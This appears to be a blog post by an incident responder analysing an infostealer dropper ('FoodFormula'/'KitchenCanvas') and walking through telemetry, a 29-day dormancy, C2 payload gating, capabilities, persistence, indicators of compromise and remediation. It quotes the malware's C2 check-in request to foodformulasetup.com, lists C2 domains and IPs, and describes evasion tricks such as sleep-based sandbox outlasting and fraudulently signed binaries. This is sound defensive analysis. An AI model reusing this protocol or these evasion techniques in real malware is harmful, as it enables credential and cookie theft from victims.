Introduction
This investigation started with a SentinelOne confidence level escalation, a file that had been sitting on an endpoint as "suspicious" quietly upgraded itself to "malicious." What followed was a full-day forensic deep-dive that produced a complete picture of a well-designed infostealer campaign: time-based sandbox evasion, server-side payload gating, scheduled task persistence, credential theft, browser cookie harvesting, and an active multi-victim distribution campaign.
The most interesting part of this case isn't the malware itself, it's the 29 days of silence between initial execution and payload deployment. That gap is deliberate, documented, and explainable. This post walks through how I reconstructed it from first principles using telemetry data and sandbox detonation.
The Alert
The alert was a confidence level change notification from SentinelOne: an executable named FoodFormula_552655.exe had escalated from suspicious to malicious on a client workstation. Pulling up the threat detail revealed the first set of problems.
The site policy was set to Protect. SentinelOne had flagged and tracked the file since February 26 {43 days earlier}, but had no genuine reason to act on it because it downloaded, dropped files, and went dormant. No analyst had ever reviewed the alert. The endpoint showed 2 unmitigated threats.
The machine was online and the threat had been sitting unactioned for over six weeks. I isolated the endpoint immediately via the S1 console before digging further.
Two Separate Threats
The first alert notification referenced FoodFormula_552655.exe, but the threat detail page I initially pulled showed a different file: OneBUpdateService.exe. These are two distinct threats chained together, not the same detection.
Threat 1: FoodFormula_552655.exe
- Path:
C:\Users\[user]\Downloads\FoodFormula_552655.exe - SHA256:
b179bec73efe194bffb69eeedc8c136b5e7506a10b3589d223b1e6f8a8fbfb53 - Classification: Ransomware (later revised to infostealer/dropper)
- Detection type: Dynamic — Behavioral AI, Reputation
- Publisher: INSTALLERIM LLC (signed, fraudulent cert)
- Origin: Downloaded via Chrome on Feb 26
- Threat indicators: 18
Threat 2: — OneBUpdateService.exe
- Path:
C:\Users\[user]\AppData\Local\OB\OneBUpdate\OneBUpdateService.exe - Classification: Malware (static detection)
- Publisher: WORK PRODUCT INC. (signed, fraudulent cert)
- Detection type: Static
FoodFormula is the dropper. OneBUpdateService is the payload it installed. The two detections represent different stages of the same infection.
VirusTotal: Confirming the Family
Submitting the FoodFormula SHA256 to VirusTotal returned 14/71 detections. The popular threat label was trojan.bundler/conivus with family labels of bundler, conivus, and tedy. ReversingLabs labeled it Win32.Packed.Conivus. The CAPE Sandbox had previously detonated it and flagged 89 network connections and 6 dropped files.
Notably, the Reputation detection engine in SentinelOne's policy was disabled for this site, one of the detection paths that would have flagged this file earlier was turned off.
SDL Telemetry: What Actually Happened
I pulled Singularity Data Lake exports filtered by the FoodFormula storyline ID across the full date range. The resulting telemetry covered 790 events spanning March 27 through April 10, with a gap from February 26 through March 26 showing no activity.
The Full Infection Timeline
FoodFormula_552655.exe downloaded via Chrome and executed by the end user. S1 flagged it immediately as suspicious. No child processes observed in SDL telemetry — the dropper executed, staged its components, and exited quickly before full EDR instrumentation could capture its process tree.
No storyline activity. The dropper had staged components on disk but nothing observable ran. This is the deliberate dormancy period; explained in detail below.
onebrowser.exe (running from C:\Users\[user]\AppData\Local\Temp\ECE4.tmp\) executed setup.exe, which created a scheduled task named \OneBUpdate and launched OneBUpdateService.exe for the first time. The task was configured to run daily at approximately 08:17 in the end user's context.
OneBUpdateService.exe resolved oneinternetbrowser.com and connected to 104.18.2.55 or 104.18.3.55 on port 443 approximately every 60 minutes for the duration of the business day. 86 confirmed callouts over 12 days. Weekends show no activity, consistent with the machine being powered off. The scheduled task fired every morning at ~08:17 as the workday began.
S1 confidence level escalated to malicious, generating the alert that triggered this investigation. I isolated the endpoint. At 14:01 and again at 14:57, S1 Pre Execution Detection blocked setup.exe attempting to re-drop OneBUpdateService.exe — the scheduled task was still firing even after isolation.
Why 29 Days? The Dormancy Explained
Direct SDL queries for FoodFormula_552655.exe and onebrowser.exe as source processes returned no results. Both ran as short-lived installer processes and exited before generating observable telemetry. This is consistent with how well-designed droppers operate — they stage components and clean up quickly.
The dormancy question was answered by the Joe Sandbox behavioral analysis. Under "Highlighted Actions," the sandbox captured two specific API calls:
GetTickCount + Sleep
These two API calls together are a classic time-based sandbox evasion technique. The binary calls GetTickCount to measure elapsed system time, then uses Sleep to delay execution. Most sandboxes detonate samples for 2–5 minutes. Joe Sandbox had to modify the Sleep calls to extract any behavioral data at all — without that intervention, the sample would have timed out showing zero activity.
But the local Sleep timer only explains how the binary evades automated sandbox analysis. The 29-day real-world gap is explained by something else entirely — the C2 protocol.
The C2 Protocol: Server-Side Gating
Joe Sandbox's HTTPS proxied packet capture revealed the complete C2 handshake. This is the most forensically significant finding in the entire investigation.
The outbound registration request from the dropper:
GET /?s=bbc6ca46fdb96e3f2a1db8480e549ea35b11ca958bf8f479f14826d60ed4dc17&d=6798437 HTTP/1.1
Host: foodformulasetup.com
Accept: */*The server responded with HTTP 200, Content-Length 64, and a 64-byte ASCII string:
dfa40a4e120e9029cbc3129a898f1c8a023ec446d83647d6f24d811c1c7a4499The s= parameter is the victim fingerprint, a unique identifier, for the infected machine. The d= parameter is a counter that increments between calls. The 64-byte response is almost certainly an encrypted task identifier or decryption key returned by the operator.
What this means: the C2 operator controls when each victim receives its payload. The dropper checks in and waits for the server to gate delivery. The 29-day gap isn't a local timer, it's the operator deciding when to activate this particular victim. This is server-side staging, not just a local sleep call.
Prior submissions of the same hash to Joe Sandbox showed an earlier call with d=6. The production infection showed d=6798437. The counter increments with each check-in, and the server evaluates it before responding with a delivery instruction.
What the Malware Actually Does
VT behavior analysis and Joe Sandbox detonation confirmed capabilities well beyond a simple dropper. The full capability set:
Infostealer Capabilities (Confirmed)
- Windows Credential Manager access :
VaultSvcopened directly; stored credentials in scope - Browser cookie theft :
cookies.txtwritten to temp via embedded libcurl; staged for exfiltration - Clipboard monitoring :
clipsvcaccessed; anything copied during active infection potentially captured - File and directory discovery : active filesystem recon (T1083)
- Video/screen capture capability : T1125 detected in sandbox
- Tor onion address embedded : backup C2 channel beyond Cloudflare-fronted infrastructure
Evasion Techniques (Confirmed)
- Time-based evasion via
GetTickCount+Sleep(sandbox outlasting) - Reflective DLL injection:
secur32.dll,sspicli.dll,IPHLPAPI.DLLloaded from RWX memory regions - Cloudflare CDN fronting of C2 infrastructure (blends with legitimate HTTPS traffic)
- Electron application wrapper: bundles a full Chromium-based app as cover
- Fraudulent code signing certificate (INSTALLERIM LLC) for signature trust bypass
- Polymorphic filename distribution: same binary, randomized numeric suffix per victim
The Electron wrapper deserves a note. FoodFormula drops a full working "Food Formula" application complete with Chrome .pak files, ffmpeg.dll, d3dcompiler_47.dll, and an Electron LICENSE file into AppData\Roaming\FoodFormula\. From the end user's perspective, something installed. The legitimate-looking application runs while the infostealer components operate underneath it.
The resources.pak file dropped by the installer shows entropy of 7.996 out of a theoretical maximum of 8.0 and is flagged as encrypted. Normal Electron resource packages don't hit near-maximum entropy. This file almost certainly contains additional encrypted payload or configuration data hidden inside what appears to be a standard Chromium resource.
The Scheduled Task: Persistence Mechanism
The SDL scheduled task telemetry gave me the complete persistence configuration without needing physical access to the machine:
| Field | Value |
|---|---|
| Task Name | \OneBUpdate |
| Executable | C:\Users\[user]\AppData\Local\OB\OneBUpdate\OneBUpdateService.exe |
| Created | Mar 27, 2026 17:17 |
| Daily trigger | ~08:17 (user context) |
| Last fired | Apr 10, 2026 15:17 — post-isolation |
The task fired at approximately 08:17 every morning the machine was powered on, consistent with the workday start. It continued firing after I isolated the endpoint, confirming the persistence mechanism was still live. Post-isolation, S1 Pre Execution Detection blocked two re-drop attempts (14:01 and 14:57) from setup.exe spawned by the task.
The Campaign: Broader Context
Joe Sandbox's hash search returned 6 prior submissions of the same SHA256 between February 6 and March 10, 2026. All under randomized filenames:
- FoodFormula_677986.exe — Feb 6
- FoodFormula_386583.exe — Feb 12
- KitchenCanvas_239364.exe — Feb 12
- FoodFormula_854236.exe — Feb 18
- FoodFormula_734382.exe — Feb 26 (our infection date)
- FoodFormula_499326.exe — Mar 10
The KitchenCanvas variant is notable because it's the same binary distributed under a completely different lure theme. Joe Sandbox context view also showed the C2 infrastructure associated with multiple KitchenCanvas_343445.exe and KitchenCanvas_885406.exe submissions, and the dropped System.dll matched samples from Coessential.exe, which Joe attributed to Remcos and GuLoader. This campaign shares infrastructure with known RAT distribution operations.
The endpoint in this investigation was infected on Feb 26, the same day someone else submitted the same hash to Joe Sandbox for analysis. The campaign was already being tracked while it was actively deploying.
Indicators of Compromise
| Indicator | Type | Notes |
|---|---|---|
| b179bec73efe194bffb69eeedc8c136b5e7506a10b3589d223b1e6f8a8fbfb53 | SHA256 | FoodFormula dropper |
| foodformulasetup.com | C2 Domain | Initial registration |
| formulas.foodformulasetup.com | C2 Domain | Payload delivery |
| oneinternetbrowser.com | C2 Domain | Hourly beacon (OneBUpdateService) |
| 104.18.2.55 | C2 IP | Cloudflare-fronted C2 |
| 104.18.3.55 | C2 IP | Cloudflare-fronted C2 |
| 104.26.4.123 | C2 IP | foodformulasetup.com resolution |
| 104.26.5.123 | C2 IP | foodformulasetup.com resolution |
| 172.67.73.218 | C2 IP | foodformulasetup.com resolution |
| FoodFormula_[random].exe | Filename pattern | Polymorphic distribution |
| KitchenCanvas_[random].exe | Filename pattern | Alternate lure theme |
| \OneBUpdate | Scheduled Task | Persistence mechanism |
| AppData\Local\OB\OneBUpdate\ | File Path | Payload staging directory |
| AppData\Roaming\FoodFormula\ | File Path | Electron cover app |
Remediation
Given the confirmed infostealer capabilities, credential manager access, browser cookie theft, clipboard monitoring, and 14 days of active beaconing before containment; clean-and-remediate was not appropriate here. The endpoint received a full wipe and reimage.
Prior to the wipe, forensic artifacts were preserved via SentinelOne Fetch Files for sandbox analysis. The scheduled task name and full configuration were documented from SDL telemetry, so remediation verification didn't require physical access to the machine beforehand.
Network-level blocks were applied at the firewall for all C2 IPs and at the DNS filtering layer for all three C2 domains. End user credentials were treated as compromised and reset given the confirmed credential manager and cookie theft behavior.
Lessons Learned
Even Protect policies can miss things. This machine had been compromised since February 26. The policy didn't prevent the initial infection, but it flagged the payload the moment it tried to run on March 27. Six weeks of unreviewed alerts in Detect mode meant the C2 channel was open for over two weeks before anyone looked.
A 29-day gap in telemetry is not evidence of inactivity. The absence of SDL events between February 26 and March 27 initially suggested the dropper did nothing. It didn't. it staged components quietly and exited. Short-lived installer processes frequently fall through EDR telemetry gaps. The absence of process events is not the same as the absence of impact.
The C2 protocol is worth documenting, not just the IOCs. Knowing the C2 IP addresses is useful for blocking. Understanding that the server gates payload delivery via a counter in the URL parameter explains the entire dormancy mystery and tells you something important about how this campaign operates. The operator has full visibility into each victim's progression and can tune the timing per target.
Signed binaries warrant behavioral scrutiny, not trust. Both the dropper and the payload carried valid code signing certificates from publishers with no connection to the software they claimed to be. A signed binary is not a clean binary. SentinelOne's behavioral engine correctly ignored the signature and classified the runtime behavior instead.
Storyline ID filtering is the most efficient SDL query approach for active incidents. Querying by process name returned nothing because the dropper processes were too short-lived to generate their own telemetry as source processes. The storyline filter captured everything S1 chained to the infection including events from parent processes that wouldn't surface in name-based queries.
Conclusion
What started as a confidence level change notification turned into a six-week retrospective on an infostealer that had been operating quietly on a managed endpoint. The 29-day dormancy was deliberate and well-engineered; a combination of local sleep-based sandbox evasion and server-side payload gating that kept the dropper invisible through automated detection windows and left a gap too large for most 14-day threat hunting lookbacks to catch.
The full picture only emerged by combining SDL telemetry exports, VirusTotal behavioral analysis, and Joe Sandbox detonation to reconstruct what the binary actually did and what the C2 infrastructure was actually saying back to it. No single tool had the complete story. The forensic value came from correlating across all of them.
The campaign infrastructure overlaps with known Remcos and GuLoader distribution networks and was actively pushing the same binary under multiple lure names at the time of this investigation. If you're seeing FoodFormula or KitchenCanvas executables in your telemetry, treat them as active infostealers and hunt the C2 domains immediately.